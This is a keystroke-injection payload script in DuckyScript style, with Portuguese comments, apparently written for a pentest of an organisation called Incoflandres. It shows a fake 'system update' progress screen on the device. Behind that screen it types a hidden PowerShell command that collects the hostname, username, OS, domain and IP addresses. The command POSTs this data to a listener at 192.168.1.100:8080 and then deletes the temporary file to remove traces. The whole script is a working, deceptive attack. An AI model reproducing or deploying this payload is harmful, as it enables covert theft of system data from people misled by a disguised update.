REM =====================================================================
REM PAYLOAD 1: Progress Bar + Controlled System Information Exfiltration
REM Pentest Autorizado - Incoflandres
REM Objetivo: Demonstrar exfiltração discreta com interface convincente
REM Status: Não-destrutivo / Reversível
REM =====================================================================

REM Configuração inicial do dispositivo
LED_OFF
DISPLAY_CLEAR
WIFI_ON

REM Exibir interface de "atualização do sistema" convincente
DISPLAY_TEXT 0 0 Sistema Incoflandres
DISPLAY_TEXT 0 10 Atualizacao v2.1.3
DISPLAY_TEXT 0 20 Aguarde...

REM Barra de progresso visual
LED 0 255 0 100
DELAY 2000

REM Fase 1: Coleta de informações básicas do sistema (15%)
DISPLAY_TEXT 0 30 [###___________] 15%
GUI R
DELAY 1000
STRING powershell -WindowStyle Hidden -Command "
DELAY 500
STRING $info = @{
DELAY 200
STRING   hostname = $env:COMPUTERNAME;
DELAY 200
STRING   username = $env:USERNAME;
DELAY 200
STRING   os = (Get-WmiObject Win32_OperatingSystem).Caption;
DELAY 200
STRING   version = (Get-WmiObject Win32_OperatingSystem).Version;
DELAY 200
STRING   domain = $env:USERDOMAIN;
DELAY 200
STRING   ip = (Get-NetIPAddress -AddressFamily IPv4 | Where-Object {$_.IPAddress -notlike '127.*'}).IPAddress;
DELAY 200
STRING   timestamp = Get-Date
DELAY 200
STRING };
DELAY 500
STRING $json = $info | ConvertTo-Json;
DELAY 500
STRING $json | Out-File -FilePath '$env:TEMP\sysinfo_incoflandres.txt' -Encoding UTF8;
DELAY 1000

REM Atualizar barra de progresso (35%)
LED 100 200 0 150
DISPLAY_TEXT 0 30 [######________] 35%
DELAY 3000

REM Fase 2: Exfiltração via HTTP (GET request disfarçado)
DISPLAY_TEXT 0 30 [#########_____] 65%
STRING Invoke-WebRequest -Uri 'http://192.168.1.100:8080/update' -Method POST -Body $json -ContentType 'application/json' -UseBasicParsing -ErrorAction SilentlyContinue;
DELAY 2000

REM Fase 3: Limpeza de rastros (85%)
LED 200 100 0 200
DISPLAY_TEXT 0 30 [############__] 85%
STRING Remove-Item '$env:TEMP\sysinfo_incoflandres.txt' -Force -ErrorAction SilentlyContinue;
DELAY 1000
STRING exit"
ENTER

REM Finalização da "atualização" (100%)
DELAY 3000
LED 0 255 0 255
DISPLAY_TEXT 0 30 [##############] 100%
DISPLAY_TEXT 0 40 Concluido!
DELAY 2000

REM Reset visual para parecer que a atualização terminou
DISPLAY_CLEAR
DISPLAY_TEXT 0 0 Sistema atualizado
DISPLAY_TEXT 0 10 Reinicie o computador
DISPLAY_TEXT 0 20 para aplicar mudancas
LED_OFF

REM Modo stealth - aguardar remoção manual
WAIT_FOR_BUTTON_PRESS
RESET